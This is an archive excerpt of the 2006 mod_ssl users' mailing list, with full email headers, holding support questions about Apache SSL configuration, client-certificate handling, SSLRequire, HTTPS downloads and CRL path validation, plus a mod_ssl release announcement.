User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 27 22:06:03 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0715714D8AD; Thu, 27 Jul 2006 22:06:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bay0-omc1-s17.bay0.hotmail.com (bay0-omc1-s17.bay0.hotmail.com [65.54.246.89])
	by master.modssl.org (Postfix) with ESMTP id 80AAD14D833
	for ; Thu, 27 Jul 2006 22:06:01 +0200 (CEST)
Received: from hotmail.com ([65.54.162.20]) by bay0-omc1-s17.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Thu, 27 Jul 2006 13:05:47 -0700
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 27 Jul 2006 13:05:47 -0700
Message-ID: 
Received: from 65.54.162.200 by by108fd.bay108.hotmail.msn.com with HTTP;
	Thu, 27 Jul 2006 20:05:45 GMT
X-Originating-IP: [209.0.86.40]
X-Originating-Email: [devals9@hotmail.com]
X-Sender: devals9@hotmail.com
From: "DEVAL SHAH" 
To: modssl-users@modssl.org
Subject: Apache and multiple IP address
Date: Thu, 27 Jul 2006 20:05:45 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
X-OriginalArrivalTime: 27 Jul 2006 20:05:47.0379 (UTC) FILETIME=[0CD17430:01C6B1B8]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "DEVAL SHAH" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
I just configured Apache to use SSL using mod_ssl.

Now I have a scenario - I have 2 IP adrress - 1 internal [192.1.1.0] and 1 
external IP [209.1.0.0] address. Apache works for internal IP address but 
not for external.

When I set up Apache to listen to SSL this is what I set up:


DocumentRoot "/usr/local/apache2/htdocs"
ServerName 192.1.1.0
SSLEngine ON
SSLCertificateFile ...
SSLCertificateKeyFile ...



Apache works for internal IP address but not for external.
I want to configure my Apache and SSL so that request to either internal or 
external IP should work.

How should I go about doing it ?

Thank you
Deval


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 28 16:04:12 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B18F414D8B6; Fri, 28 Jul 2006 16:04:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp1.engelschall.com (visp1.engelschall.com [195.30.6.144])
	by master.modssl.org (Postfix) with ESMTP id AE30214D829;
	Fri, 28 Jul 2006 16:04:11 +0200 (CEST)
Received: by visp1.engelschall.com (Postfix, from userid 21100)
	id 4E7D11B44820; Fri, 28 Jul 2006 16:04:11 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8079BA17D0; Fri, 28 Jul 2006 16:03:44 +0200 (CEST)
Date: Fri, 28 Jul 2006 16:03:44 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.28 for Apache 1.3.37
Message-ID: <20060728140344.GA94639@engelschall.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Organization: Engelschall, Germany.
User-Agent: Mutt/1.5.12 OpenPKG/CURRENT-2006-07-14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Apache 1.3.37 was released because of security issues.
Find a corresponding mod_ssl 2.8.28-1.3.37 at modssl.org now, too.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 28 21:50:51 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8076614D89B; Fri, 28 Jul 2006 21:50:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.visiongrp.com (smtp.visiongrp.com [65.162.166.21])
	by master.modssl.org (Postfix) with ESMTP id F32A014D829
	for ; Fri, 28 Jul 2006 21:50:50 +0200 (CEST)
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Apache and multiple IP address
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Fri, 28 Jul 2006 13:50:32 -0600
Message-ID: 
In-Reply-To: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Apache and multiple IP address
Thread-Index: AcaxuBFM8G2WpHJUTjWWM3clVrt+8AAxvGRA
From: "Terry, Jason" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Terry, Jason" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users







-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of DEVAL SHAH
Sent: Thursday, July 27, 2006 2:06 PM
To: modssl-users@modssl.org
Subject: Apache and multiple IP address

Hello,
I just configured Apache to use SSL using mod_ssl.

Now I have a scenario - I have 2 IP adrress - 1 internal [192.1.1.0] and
1=20
external IP [209.1.0.0] address. Apache works for internal IP address
but=20
not for external.

When I set up Apache to listen to SSL this is what I set up:


DocumentRoot "/usr/local/apache2/htdocs"
ServerName 192.1.1.0
SSLEngine ON
SSLCertificateFile ...
SSLCertificateKeyFile ...



Apache works for internal IP address but not for external.
I want to configure my Apache and SSL so that request to either internal
or=20
external IP should work.

How should I go about doing it ?

Thank you
Deval


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 31 14:54:36 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C170014D8A5; Mon, 31 Jul 2006 14:54:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.netsys-it.de (netsys-it.de [217.160.110.84])
	by master.modssl.org (Postfix) with ESMTP id 8D5FD14D82B
	for ; Mon, 31 Jul 2006 14:54:36 +0200 (CEST)
Received: from p54b8c17b.dip0.t-ipconnect.de ([84.184.193.123] helo=[192.168.1.50])
	by mail.netsys-it.de with asmtp (TLSv1:RC4-MD5:128)
	(Exim 4.34)
	id 1G7XHp-00044Z-Ty
	for modssl-users@modssl.org; Mon, 31 Jul 2006 14:54:22 +0200
Message-ID: <44CDFD7D.1080700@netsys-it.de>
Date: Mon, 31 Jul 2006 14:54:21 +0200
From: =?ISO-8859-1?Q?Andr=E9_Weidemann?= 
User-Agent: Thunderbird 1.5.0.5 (Windows/20060719)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: error handling if certificate based auth has failed
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Andr=E9_Weidemann?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,
is there a way to display an error page in case certificate based 
authentication has failed? I have read the mod_ssl reference page and 
searched the mailing list archive, but have not found any hints.
It would be great to see an error page instead of an empty window or a 
cryptic browser error when a non-authorized user has tried to access a 
location with "SSLVerifyClient require".

Thanks for you help.
  André
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  2 11:37:54 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 37F8A14D8A8; Wed,  2 Aug 2006 11:37:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wip-cdctls-mx3.wipro.com (wip-cdctls-mx3.wipro.com [203.91.201.23])
	by master.modssl.org (Postfix) with ESMTP id 53BB814D859
	for ; Wed,  2 Aug 2006 11:37:52 +0200 (CEST)
Received: from wip-cdctls-mx3.wipro.com (localhost.localdomain [127.0.0.1])
	by localhost (Postfix) with ESMTP id 1615A29C09A
	for ; Wed,  2 Aug 2006 15:07:51 +0530 (IST)
Received: from chn-snr-bh1.wipro.com (chn-snr-bh1.wipro.com [10.145.50.91])
	by wip-cdctls-mx3.wipro.com (Postfix) with ESMTP id 0A8BD29C080
	for ; Wed,  2 Aug 2006 15:07:51 +0530 (IST)
Received: from HYD-MDP-MBX01.wipro.com ([10.150.50.182]) by chn-snr-bh1.wipro.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 2 Aug 2006 15:07:50 +0530
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C6B617.51FD4B78"
Subject: SSLRequire with REQUEST_URI
Date: Wed, 2 Aug 2006 15:07:04 +0530
Message-ID: <20D88322B9D55444A327FEB661C3039001F12D9F@HYD-MDP-MBX01.wipro.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSLRequire with REQUEST_URI
Thread-Index: Aca2FzbgyK+Hx/DWSOicYZbLYSfP8w==
From: 
To: 
X-OriginalArrivalTime: 02 Aug 2006 09:37:50.0825 (UTC) FILETIME=[52520D90:01C6B617]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C6B617.51FD4B78
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Hi,

=0D

=0D

I configured my httpd.conf as below



            SSLRequire %{REQUEST_URI} =3D=3D "/abc/werty"



=0D

But the same is not working.

=0D

=0D

Please let me know the reason, or I missed any thing?

=0D

=0D

=0D

Regards,

Gannarapu

=0D

=0D

=0D

=0D

=0D




The information contained in this electronic message and any attachments to=
 this message are intended for the exclusive use of the addressee(s) and=
 may contain proprietary, confidential or privileged information. If you=
 are not the intended recipient, you should not disseminate, distribute or=
 copy this e-mail. Please notify the sender immediately and destroy all=
 copies of this message and any attachments.=0D

WARNING: Computer viruses can be transmitted via email. The recipient=
 should check this email and any attachments for the presence of viruses.=
 The company accepts no liability for any damage caused by any virus=
 transmitted by this email.
=0D
www.wipro.com
------_=_NextPart_001_01C6B617.51FD4B78
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















Hi,



 



 



I configured my httpd.conf as=
 below



<Location />



        &=
nbsp;  
SSLRequire %{REQUEST_URI} =3D=3D=
 “/abc/werty”



</Location>



 



But the same is not=
 working.



 



 



Please let me know the reason, or I missed any=
 thing?



 



 



 



Regards,



Gannarapu



 



 



 



 



 












The information contained in this electronic message and any attachments to=
 this message are intended for the exclusive use of the addressee(s) and=
 may contain proprietary, confidential or privileged information. If you=
 are not the intended recipient, you should not disseminate, distribute or=
 copy this e-mail. Please notify the sender immediately and destroy all=
 copies of this message and any attachments. 



WARNING: Computer viruses can be transmitted via email. The recipient=
 should check this email and any attachments for the presence of viruses.=
 The company accepts no liability for any damage caused by any virus=
 transmitted by this email.

 

www.wipro.com



------_=_NextPart_001_01C6B617.51FD4B78--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  3 13:47:35 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E9D7714DCC4; Thu,  3 Aug 2006 13:47:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wip-cdctls-mx3.wipro.com (wip-cdctls-mx3.wipro.com [203.91.201.23])
	by master.modssl.org (Postfix) with ESMTP id 8DF5A14D83B
	for ; Thu,  3 Aug 2006 13:47:33 +0200 (CEST)
Received: from wip-cdctls-mx3.wipro.com (localhost.localdomain [127.0.0.1])
	by localhost (Postfix) with ESMTP id D690829C1B8
	for ; Thu,  3 Aug 2006 17:17:30 +0530 (IST)
Received: from chn-snr-bh1.wipro.com (chn-snr-bh1.wipro.com [10.145.50.91])
	by wip-cdctls-mx3.wipro.com (Postfix) with ESMTP id C8CC929C005
	for ; Thu,  3 Aug 2006 17:17:30 +0530 (IST)
Received: from HYD-MDP-MBX01.wipro.com ([10.150.50.182]) by chn-snr-bh1.wipro.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Thu, 3 Aug 2006 17:17:30 +0530
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C6B6F2.99ACBE46"
Subject: SSLRequire with Request_URI
Date: Thu, 3 Aug 2006 17:16:45 +0530
Message-ID: <20D88322B9D55444A327FEB661C3039001F8BE10@HYD-MDP-MBX01.wipro.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSLRequire with Request_URI
Thread-Index: Aca28n7YLdWWCg6jSga9JdXHrm4bqg==
From: 
To: 
X-OriginalArrivalTime: 03 Aug 2006 11:47:30.0648 (UTC) FILETIME=[99DE9580:01C6B6F2]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C6B6F2.99ACBE46
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Hi,

=0D

=0D

I configured my httpd.conf  as below



            SSLRequire %{REQUEST_URI} =3D=3D "/abc/werty"



=0D

But the same is not working.

=0D

=0D

Please let me know the reason, or I missed any thing?

=0D

=0D

=0D

Regards,

Gannarapu

=0D




The information contained in this electronic message and any attachments to=
 this message are intended for the exclusive use of the addressee(s) and=
 may contain proprietary, confidential or privileged information. If you=
 are not the intended recipient, you should not disseminate, distribute or=
 copy this e-mail. Please notify the sender immediately and destroy all=
 copies of this message and any attachments.=0D

WARNING: Computer viruses can be transmitted via email. The recipient=
 should check this email and any attachments for the presence of viruses.=
 The company accepts no liability for any damage caused by any virus=
 transmitted by this email.
=0D
www.wipro.com
------_=_NextPart_001_01C6B6F2.99ACBE46
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















Hi,



 



 



I configured my httpd.conf  as=
 below



<Location />



        &=
nbsp;  
SSLRequire %{REQUEST_URI} =3D=3D=
 “/abc/werty”



</Location>



 



But the same is not=
 working.



 



 



Please let me know the reason, or I missed any=
 thing?



 



 



 



Regards,



Gannarapu



 












The information contained in this electronic message and any attachments to=
 this message are intended for the exclusive use of the addressee(s) and=
 may contain proprietary, confidential or privileged information. If you=
 are not the intended recipient, you should not disseminate, distribute or=
 copy this e-mail. Please notify the sender immediately and destroy all=
 copies of this message and any attachments. 



WARNING: Computer viruses can be transmitted via email. The recipient=
 should check this email and any attachments for the presence of viruses.=
 The company accepts no liability for any damage caused by any virus=
 transmitted by this email.

 

www.wipro.com



------_=_NextPart_001_01C6B6F2.99ACBE46--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 12 05:25:31 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A164214D8A5; Sat, 12 Aug 2006 05:25:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.wrs.com (mail.windriver.com [147.11.1.11])
	by master.modssl.org (Postfix) with ESMTP id 04E0E14D836
	for ; Sat, 12 Aug 2006 05:25:30 +0200 (CEST)
Received: from ala-mail04.corp.ad.wrs.com (ala-mail04 [147.11.57.145])
	by mail.wrs.com (8.13.6/8.13.3) with ESMTP id k7C3PSvH027218
	for ; Fri, 11 Aug 2006 20:25:28 -0700 (PDT)
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C6BDBE.F561892F"
Subject:  SSL and content-type
Date: Fri, 11 Aug 2006 20:25:27 -0700
Message-ID: <205D614FB7B84C468726248150BC46AECDD513@ala-mail04.corp.ad.wrs.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic:  SSL and content-type
Thread-Index: Aca9vvSFaqY5sD6PR42GVIq9GDvo8A==
From: "Kottaridis, Chris" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kottaridis, Chris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C6BDBE.F561892F
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

I am trying to switch to a secure server. Currently, when running an
unsecure server I call a php page, called download.php, and it prints
out two headers and then a comma separated list that it will drop into a
file that I can use a spreadsheet on. The code looks like this:
=20
      header("Content-Type: text/comma-separated-values");
      header("Content-Disposition: application;
filename=3DClassRoster.csv");
      $class =3D $classid;
      $tdata =3D tpl_class_roster('download');
      $csv->show($tdata);

The header() routine adds the stirngs to the headers and the $csv-show()
has the two dimensional array displayed in a comma separated list
format. This works perfectly fine when I don't use a secure server and
access this using http:.
=20
When I switch to a secure server all the other pages work fine, but this
one the browser complains that it can't find or access the file.
now if I comment out the first header line:
=20
/*
 header("Content-Type: text/comma-separated-values");
*/
      header("Content-Disposition: application;
filename=3DClassRoster.csv");
      $class =3D $classid;
      $tdata =3D tpl_class_roster('download');
      $csv->show($tdata);

Then I do get the two dimensional array to show up on the screen in the
comma seperated list format as plain text, it doesn't bring up the
spreadsheet.
=20
Is there something else I need to do, add another header or set some
httpd setting to allow the Content-Type header above to operate in the
same manner that it does when not running httpd in secure mode ?
=20
Is this some browser option that does not like the Content-Type header ?
=20
Any pointers would be appreciated.
=20
Thanks
=20
Chris Kottaridis
Customer Support Engineer
Wind River Systems
719-522-9786

Customer Support Users' Guide (CSUG) for our support processes at:
http://www.windriver.com/support/resources/csug.pdf
=20
To create and update your TSRs online, visit our TSR Manager (login
required) at:
https://www.windriver.com/windsurf/tsrview/
=20
Tech Tips, FAQs, Discussion Group, Proactive Alert and lot more at:
http://www.windriver.com/windsurf/tsrview/
 =20
=20

------_=_NextPart_001_01C6BDBE.F561892F
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable







I am =
trying to=20
switch to a secure server. Currently, when running an unsecure server I =
call a=20
php page, called download.php, and it prints out two headers and then a =
comma=20
separated list that it will drop into a file that I can use a =
spreadsheet on.=20
The code looks like this:


 


      =
header("Content-Type:=20
text/comma-separated-values");
     =20
header("Content-Disposition: application;=20
filename=3DClassRoster.csv");
      $class =
=3D=20
$classid;
      $tdata =3D=20
tpl_class_roster('download');
     =20
$csv->show($tdata);


The =
header() routine=20
adds the stirngs to the headers and the $csv-show() has the two =
dimensional=20
array displayed in a comma separated list format. This works =
perfectly fine=20
when I don't use a secure server and access this using=20
http:.


 


When I =
switch to a=20
secure server all the other pages work fine, but this one the browser =
complains=20
that it can't find or access the file.


now if =
I comment out=20
the first header line:


 


/*


 header("Content-Type:=20
text/comma-separated-values");


*/
     =20
header("Content-Disposition: application;=20
filename=3DClassRoster.csv");
      $class =
=3D=20
$classid;
      $tdata =3D=20
tpl_class_roster('download');
     =20
$csv->show($tdata);


Then I =
do get the=20
two dimensional array to show up on the screen in the comma seperated =
list=20
format as plain text, it doesn't bring up the =
spreadsheet.


 


Is =
there something=20
else I need to do, add another header or set some httpd setting to allow =
the=20
Content-Type header above to operate in the same manner that it does =
when not=20
running httpd in secure mode ?


 


Is =
this some browser=20
option that does not like the Content-Type header ?


 


Any =
pointers would=20
be appreciated.


 


Thanks


 


Chris =
Kottaridis


Customer Support =
Engineer


Wind River =
Systems


719-522-9786



Customer Support Users' Guide (CSUG) for our =
support=20
processes at:
http://www.windriver.com/support/resources/csug.pdfTo create and update your TSRs online, visit our =
TSR Manager=20
(login required) at:
https://www.windriver.com/windsurf/tsrview/
Tech Tips, FAQs, Discussion Group, Proactive Alert =
and lot=20
more at:
http://www.windriver.com/windsurf/tsrview/ 


 


------_=_NextPart_001_01C6BDBE.F561892F--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 30 00:15:59 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DD71414D890; Wed, 30 Aug 2006 00:15:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.headsprout.com (mail.headsprout.com [207.195.230.84])
	by master.modssl.org (Postfix) with ESMTP id 3A63514D85E
	for ; Wed, 30 Aug 2006 00:15:57 +0200 (CEST)
Received: from [192.168.1.230] ([71.240.121.212])
	(authenticated user robert@headsprout.com)
	by mail.headsprout.com
	for modssl-users@modssl.org;
	Tue, 29 Aug 2006 15:15:50 -0700
Mime-Version: 1.0 (Apple Message framework v752.2)
Content-Transfer-Encoding: 7bit
Message-Id: <907488EC-A194-4D38-A3F7-08307571C060@headsprout.com>
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: modssl-users@modssl.org
From: Robert Denton 
Subject: Question regarding IfDefine tags
Date: Tue, 29 Aug 2006 18:15:34 -0400
X-Mailer: Apple Mail (2.752.2)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Denton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello all,

I am hoping someone can clarify this for me:

I am using OpenSSL with Apache2 on windows server.  I do not believe  
that my ssl.conf file is being read when I start the apache service  
although it is included by http.conf.

I found a snipet online indicating you either need to start apache  
with -D SSL, or comment out the IfDefine tags in the ssl.conf.  When  
I do either of these and restart the apache service, the service will  
not start.

If I do neither of these things, the service starts but I cannot  
access pages via https. So my question is two-fold:

1. Why will the service not start when the IfDefine tags are  
commented out. Is it because apache is now trying to parse the  
contents of ssl.conf but running into something it doesn't  
understand? If so, wouldn't this show in error.log?

2. Is there a more appropriate forum or mailing list to take my  
troubles to?

Thanks!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 31 14:53:46 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 91E3414D867; Thu, 31 Aug 2006 14:53:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ms-smtp-05.texas.rr.com (ms-smtp-05.texas.rr.com [24.93.47.44])
	by master.modssl.org (Postfix) with ESMTP id ED13E14D84B
	for ; Thu, 31 Aug 2006 14:53:41 +0200 (CEST)
Received: from ms-mss-07.texas.rr.com ([10.93.38.41])
	by ms-smtp-05.texas.rr.com (8.13.6/8.13.6) with ESMTP id k7VCrX5F003749
	for ; Thu, 31 Aug 2006 07:53:34 -0500 (CDT)
Received: from texas.rr.com (localhost [127.0.0.1]) by ms-mss-07.texas.rr.com
 (iPlanet Messaging Server 5.2 HotFix 2.10 (built Dec 26 2005))
 with ESMTP id <0J4V00JMV5590R@ms-mss-07.texas.rr.com> for
 modssl-users@modssl.org; Thu, 31 Aug 2006 07:53:33 -0500 (CDT)
Received: from [10.93.36.23] (Forwarded-For: [137.242.1.9])
 by ms-mss-07.texas.rr.com (mshttpd); Thu, 31 Aug 2006 07:53:33 -0500
Date: Thu, 31 Aug 2006 07:53:33 -0500
From: rlabbe@satx.rr.com
Subject: Certificate and CRL Path Validation Error
To: modssl-users@modssl.org, modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
X-Mailer: iPlanet Messenger Express 5.2 HotFix 2.10 (built Dec 26 2005)
Content-type: text/plain; charset=windows-1252
Content-language: en
Content-transfer-encoding: quoted-printable
Content-disposition: inline
X-Accept-Language: en
X-Virus-Scanned: Symantec AntiVirus Scan Engine
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rlabbe@satx.rr.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

All=2C

I am working in an environment utilizing a PKI consisting of several =

Root and Intermediate Certificate Authorities=2E In order to reduce the =

overhead when requiring client authentication using digital =

certificates=2C I am using the following two directives=3A

SSLCACertificatePath =96 Used for Root and Intermediate CAs
SSLCARevocationPath =96 Used to Process Certificate Revocation Lists

I=92ve yet to encounter a version of Apache and Mod=5FSSL performing prop=
er =

path validation=2E If a user presents a certificate that is revoked=2C bu=
t =

not included in the directory containing all the PEM/Base64 encoded CRL =

files and associated symbolic links=2C Apache allows access=2E =


If a user presents a certificate issued from an Intermediate =

Certificate Authority that is not included in the directory containing =

all the Root and Intermediate CA certificates in PEM/Base64 encoded =

format and associated symbolic links=2C he/she is allowed access=2E

I would prefer the system to validate the entire chain and not allow =

access in the event a local CRL file or Intermediate CA certificate is =

not available=2E By default=2C IIS performs this path validation correctl=
y=2E =

If IIS does not have a current CRL file issued by each and every CA in =

the certificate path=2C the client is denied access=2E If IIS does not ha=
ve =

a certificate from each and every CA in the certificate path=2C the =

client is denied access=2E

I am trying to automate the process of updating the CA certificate =

directory and associated CRL directories by scheduling a job to run on =

a nightly basis=2E If Apache has a local CRL and CA certificate from each=
 =

and every CA in the path used to issue the client certificates=2C then =

all checks are performed and the client is properly validated=2E =


I would prefer the system default to =93Closed=94 instead of =93Open=94 i=
n the =

event an Intermediate CA certificate is unavailable or no CRL file is =

available=2E Again=2C the system must have at least one CA certificate =

trusted and available locally=2C but no CRL files=2E

Note=3A I have issued a client certificate from a client certificate =

issued by on of the Intermediate CAs and Apache does deny access =

because the key usage of the client certificate does not allow it to be =

used as a Root CA and issue additional client certificates=2E I used =

OpenSSL in order to issue client certificates from a client =

certificate=2E This type of path validation seems to work on all the =

versions of Apache and Mod=5FSSL I=92ve tested=2E

Thanks
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 31 15:14:37 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1E47514D867; Thu, 31 Aug 2006 15:14:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relais.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 7513B14D84B
	for ; Thu, 31 Aug 2006 15:14:35 +0200 (CEST)
Received: from avril.internal.test ([66.131.181.208])
 by VL-MO-MR004.ip.videotron.ca
 (Sun Java System Messaging Server 6.2-2.05 (built Apr 28 2005))
 with SMTP id <0J4V00I95645J7D0@VL-MO-MR004.ip.videotron.ca> for
 modssl-users@modssl.org; Thu, 31 Aug 2006 09:14:30 -0400 (EDT)
Received: (qmail 3834 invoked from network); Thu, 31 Aug 2006 13:14:29 +0000
Received: from unknown (HELO ?192.168.42.128?) (192.168.42.128)
 by avril.internal.test with SMTP; Thu, 31 Aug 2006 13:14:29 +0000
Date: Thu, 31 Aug 2006 09:14:06 -0400
From: Patrick Patterson 
Subject: Re: Certificate and CRL Path Validation Error
In-reply-to: 
To: modssl-users@modssl.org
Message-id: <200608310914.07818.ppatterson@carillonis.com>
Organization: Carillon Information Security Inc.
MIME-version: 1.0
Content-type: text/plain; charset=windows-1252
Content-transfer-encoding: quoted-printable
Content-disposition: inline
References: 
User-Agent: KMail/1.9.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Patrick Patterson 
